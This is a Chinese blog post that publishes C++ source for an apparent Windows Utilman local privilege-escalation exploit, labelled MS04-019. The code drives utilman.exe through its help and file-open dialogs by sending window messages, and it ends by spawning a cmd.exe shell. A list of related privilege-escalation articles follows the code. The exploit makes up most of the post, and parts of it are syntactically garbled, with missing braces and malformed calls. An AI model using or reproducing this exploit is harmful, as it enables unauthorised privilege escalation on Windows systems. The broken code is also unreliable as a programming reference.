Ms-0419 权限提升 C++的版本

最新推荐文章于 2025-07-01 09:04:35 发布
原创 最新推荐文章于 2025-07-01 09:04:35 发布 · 959 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#c++ #null #math.h #cmd #struct #windows

本文介绍了一种通过利用Utilman漏洞实现命令执行的技术。该技术通过修改Utilman(辅助工具管理器)来运行任意命令,适用于多种语言环境。文章详细展示了如何设置语言环境、触发漏洞并最终执行命令的过程。
//  ms0419.cpp : 定义应用程序的入口点。Powered by barenx
 //
#include  " stdafx.h "
#include  " ms0419.h "
#include  " math.h "
// #define MAX_LOADSTRING 100

 //  全局变量:
 // HINSTANCE hInst;                                 //  当前实例
 // TCHAR szTitle[MAX_LOADSTRING];                     //  标题栏文本
 // TCHAR szWindowClass[MAX_LOADSTRING];             //  主窗口类名

 //  此代码模块中包含的函数的前向声明:
 // ATOM                MyRegisterClass(HINSTANCE hInstance);
 // BOOL                InitInstance(HINSTANCE, int);
 // LRESULT CALLBACK    WndProc(HWND, UINT, WPARAM, LPARAM);
 // LRESULT CALLBACK    About(HWND, UINT, WPARAM, LPARAM);
int  set_lang( void );
 struct   {
 int id;
 char *utilman;
 char *winhelp;
 char *open;
}  lang[]  =   {
    0x0c,"Gestionnaire d'utilitaires","aide de Windows","Ouvrir" }/* French  */
    0x09,"Utility manager","Windows Help","Open" },          /* English */
    0x04,"辅助工具管理器","Windows 帮助","打开" }    /* Chinese */
} ;
 int  APIENTRY _tWinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPTSTR    lpCmdLine,
                      int        nCmdShow)
 {
    HWND lHandle, lHandle2;
    POINT point;
    char cmd[]="%windir%/system32/cmd.ex?";
    unsigned int i;
    int lang_id,j;
    //test time run this bagin
        long needtime,needmin;
        needtime=GetTickCount();
        for(long tmp=0;tmp<=120000;tmp++)
        {
            tmp/=1;
            tmp*=1;
            Sleep(0);
            tmp++;
            tmp/=1;
            Sleep(0);
            tmp--;
            tmp*=1;
            Sleep(0);
            tmp=(long)(pow(tmp,1));
            Sleep(0);
        };
        needtime=GetTickCount()-needtime;
        needmin=(long)(needtime/3);
    //test end
    lang_id=set_lang();
    for(i=0;i<sizeof(lang)/sizeof(lang[0]);i++)    if(lang[i].id==lang_id)    break;
    if(i==sizeof(lang)/sizeof(lang[0])) {return -1;}
    WinExec("utilman.exe /start",SW_HIDE);
    for(j=0;j<13;j++)
    {
        Sleep(needtime);
        lHandle=FindWindow("#32770", lang[i].utilman);
        if(lHandle!=0)break;
    }
    if (!lHandle) return 0;
    PostMessage(lHandle,0x313,0,0); //=right click on the app button in the
    Sleep(needmin);
    SendMessage(lHandle,0x365,0,0x1); //send WM_COMMANDHELP  0x0365  lParam must be<>NULL 
    Sleep(needmin);
    PostMessage(lHandle, WM_QUIT, 00);

    for(j=0;j<7;j++)
    {
        Sleep(needmin);
        lHandle=FindWindow(NULL, lang[i].winhelp);    //find help dialog
        if(lHandle!=0)
        {
            PostMessage(lHandle,WM_SHOWWINDOW,false,SW_PARENTCLOSING);
            SendMessage (lHandle, WM_IME_KEYDOWN, VK_RETURN, 0);
            break;
        }
    }
    if (!lHandle) return 0;
    
    for(j=0;j<7;j++)
    {
        Sleep(needmin);
        lHandle = FindWindow("#32770",lang[i].open);    //find open dialog
        if(lHandle!=0)
        {
            PostMessage(lHandle,WM_SHOWWINDOW,false,SW_PARENTCLOSING);
            Sleep(needmin);
            break;
        }
    }
    if (!lHandle) return 0;
    Sleep(needtime+needtime);//+needmin
    lHandle2 = GetDlgItem(lHandle, 0x47C);
    if (!lHandle2) return 0;
    //Sleep(needmin);//+needmin
    SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)cmd);
    Sleep(needmin);//+needmin
    SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
    Sleep(needmin+needtime);//+needtime
    lHandle2 = GetDlgItem(lHandle, 0x4A0);
    SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
    Sleep(needmin);

    lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
    lHandle2 = GetDlgItem(lHandle2, 0x1);
    SendMessage (lHandle2, WM_IME_KEYDOWN, 0x430); // send "c" char
    SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D0); // send "m" char
    SendMessage (lHandle2, WM_IME_KEYDOWN, 0x440); // send "d" char
    SendMessage(lHandle,WM_SHOWWINDOW,true,SW_OTHERUNZOOM);
    Sleep(needmin+5);
    PostMessage (lHandle2, WM_CONTEXTMENU, 00);
    Sleep(needmin+needmin);
    point.x =10; point.y =30;
    lHandle2=WindowFromPoint(point);
    PostMessage(lHandle,WM_SHOWWINDOW,false,SW_PARENTCLOSING);
    SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
    SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
    SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return
    Sleep(needtime);
    SendMessage (lHandle, WM_CLOSE, 00);    //find open dialog
    PostMessage (lHandle, WM_QUIT, 00);    //find open dialog
    PostMessage (FindWindow(NULL, lang[i].winhelp), WM_QUIT, 00);
    return 0;
     // TODO: 在此放置代码。
    //MSG msg;
    //HACCEL hAccelTable;

    //// 初始化全局字符串
    //LoadString(hInstance, IDS_APP_TITLE, szTitle, MAX_LOADSTRING);
    //LoadString(hInstance, IDC_MS0419, szWindowClass, MAX_LOADSTRING);
    //MyRegisterClass(hInstance);

    //// 执行应用程序初始化:
    //if (!InitInstance (hInstance, nCmdShow)) 
    //{
    //    return FALSE;
    //}

    //hAccelTable = LoadAccelerators(hInstance, (LPCTSTR)IDC_MS0419);

    //// 主消息循环:
    //while (GetMessage(&msg, NULL, 0, 0)) 
    //{
    //    if (!TranslateAccelerator(msg.hwnd, hAccelTable, &msg)) 
    //    {
    //        TranslateMessage(&msg);
    //        DispatchMessage(&msg);
    //    }
    //}

    //return (int) msg.wParam;
}

inline  int  set_lang( void )
 {
    unsigned int lang_usr,lang_sys,id;

    id=GetSystemDefaultLangID();
    lang_sys=PRIMARYLANGID(id);
    id=GetUserDefaultLangID();
    lang_usr=PRIMARYLANGID(id);
    if(lang_usr!=lang_sys) {
        //printf("warning: user language differs from system language ");
        //printf("1. system : ");print_lang(lang_sys);
        //printf("2. user   : ");print_lang(lang_usr);printf("Select(1-2): ");
        //id=getch();
    if(id!=49&&id!=50{
        //printf("wrong choice '%c', leaving. ",id);
        exit(0);
        }
    if(id==49{
        //printf("system language ");
        return lang_sys;
        }
    else;
        //printf("user language ");
    }
    return lang_usr;
}

 
Windows编程中提高程序的运行权限
06-02
Windows编程中提高程序的运行权限,总结了在Windows中解决程序运行的权限的问题,如何用代码或非代码的方式解决这一问题,文中列举了常见的几种解决方式。
给软件提升权限的方法
03-11
通过该方法操作,可以使软件以管理员身份运行,从而能够进行相当多的操作。
VC++中程序提升管理员权限的两种方法
xunying6967的博客
09-12 7208
程序的权限不够,应用管理员权限打开程序运行方可。如何使vc程序运行时请求管理员权限?如果是2005或者2008 就简单了,直接 (项目右键—属性—连接器—清单文件—uac执行级别 选择requireAdministrator&amp;nbsp;)中文版 (proj...
c++ 进程权限的提升
mmyzlinyingjie的专栏
06-27 5327
//提升权限 void CManageProcessDlg::DebugPrivilege() {  HANDLE hToken = NULL;  //打开当前进程的访问令牌  int hRet = OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);  if( hRet)  {   TOKEN_PRIVIL
Linux权限提升-内核溢出
weixin_53736204的博客
08-31 2521
系统⽤户:UID(0-999)普通⽤户:UID(1000-*)root⽤户:UID为0,拥有系统的完全控制权限。
解决api-ms-win-crt-conio-l1-1-0.dll文件丢失问题指南
最新发布
weixin_31139479的博客
07-01 966
是一个系统文件,属于 Microsoft C 运行时库(CRT)的一部分。该文件主要用于在 Windows 操作系统上,支持控制台输入输出(I/O)的功能。它为程序提供了一系列的 API(应用程序编程接口),以便程序能够执行如缓冲控制台 I/O、屏幕缓冲区管理等任务。动态链接库(Dynamic Link Library,简称DLL),是一种包含可由多个程序同时使用的代码和数据的库。在Windows操作系统中,DLL文件的扩展名为.dll。
权限提升 T1548.002 绕过UAC
qq_28205153的博客
02-17 2494
​1. 什么是 UAC 用户帐户控制 (UAC) 是 Windows Vista 和 Windows Server 2008 开始引入的一种访问控制功能。借助 UAC,应用和任务将始终在非管理员帐户的安全上下文中运行,除非管理员专门授予管理员级别的访问系统权限。 UAC 可阻止自动安装未经授权的应用并防止意外更改系统设置。 我们在运行非微软官方的软件时,即使我们的账号是属于本地管理员组的,也会以普通用户的权限来运行软件。当软件需要更改系统配置或者修改系统关键位置时,往往需要提升自己的权限来执行这些操作,此时
权限提升-1
2401_87971103的博客
06-05 866
土豆系列提权的核心是NTLM中继,通过欺骗运行在高权限(Administrator/SYSTEM)的账户进行ntlm认证,同时作为中间人对认证过程进行劫持和重放,最后调用本地认证接口使用高权限账号的ntml认证获取一个高权限token,只要当前进程拥有SeImpersonatePrivilege权限即可进行令牌模仿,即可取得对应权限。该工具支持 Windows XP 到 Windows 11 之间的所有 Windows 操作系统,包括其对应的 Windows Server 版本
C++17完整导引-基本特性
热门推荐
西门吹雪
05-19 1万+
C++ 17 的完整导引,带你进入17的代码世界
api-ms-win-crt-runtime-l1-1-0.dll 复制时显示需要权限操作
06-19
`api-ms-win-crt-runtime-l1-1-0.dll` 是 Microsoft Windows 的一个库文件,它是运行时库(C++ Runtime)的一部分,特别是负责提供低级别的核心函数和类型支持。当你尝试复制这个文件时,显示需要权限操作可能是因为...
修复api-ms-win-crt-conio-l1-1-0.dll丢失问题
api-ms-win-crt-conio-l1-1-0.dll 是 Windows 操作系统中一个非常关键的动态链接库(DLL)文件,属于 Microsoft Visual C++ 运行时库(Visual C++ Redistributable for Visual Studio)的一部分。该文件是 Windows ...
修复api-ms-win-crt-runtime-l1-1-0.dll丢失的绿色工具
推荐用户优先从微软官网下载并安装“Microsoft Visual C++ 2015-2022 Redistributable”合集版本,以确保系统具备完整的运行环境支持。 然而,在某些特殊场景下,比如系统无法联网、管理员权限受限、或者需要快速...
api-ms-win-core-path-l1-1-0.dll缺失解决方案与安装指南
ms-win-core-path-l1-1-0”遵循微软为Windows 10以后系统设计的“API集”(API Set)命名规范,其中“api-ms”表示这是一个API集,“win-core-path”代表其功能归属于核心路径处理模块,“l1-1-0”表示其版本号为第1...
解决api-ms-win-crt-runtime-l1-1-0.dll文件丢失问题
api-ms-win-crt-runtime-l1-1-0.dll 文件丢失是 Windows 操作系统中常见的运行时错误之一,通常出现在用户尝试运行某些基于 Visual C++ 开发的应用程序时。该 DLL(动态链接库)文件属于 Microsoft Visual C++ ...
VS2010 C++ 提升权限 代码(win7)
ccnyou的专栏
05-16 3479
来源:http://blog.renren.com/share/225305041/7163025407  //提权  HMODULE hDll = ::LoadLibrary("ntdll.dll");  typedef int (__stdcall * type_RtlAdjustPrivilege)(int, bool, bool, int*);  typ
windowsc++提高程序权限
fuck487的博客
08-15 8829
// If the caller has enabled the SeDebugPrivilege privilege, // the requested access is granted regardless of the contents of the security descriptor. // 如果开启了SeDebugPrivilege,则不用管安全说明符
链表堆排序
barenx的专栏
03-31 3871
堆(以下指最大堆):堆是一个完全二叉树,树中所有的非叶子节点的值均不小于其他孩子节点的值。堆排序的原理是利用堆的性质,当通过插入元素生成堆后,保证从堆顶摘除的元素(树的根节点)是堆中最大的元素。以下实现中,首先分配一个线性数组用于堆空间,数组的存放的是连接件的指针,数组的大小是连接件的计数加1,[1…n]存放堆中的连接件指针,[0]存放出入堆的连接件指针。在插入堆的过程中,首先在数组[
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值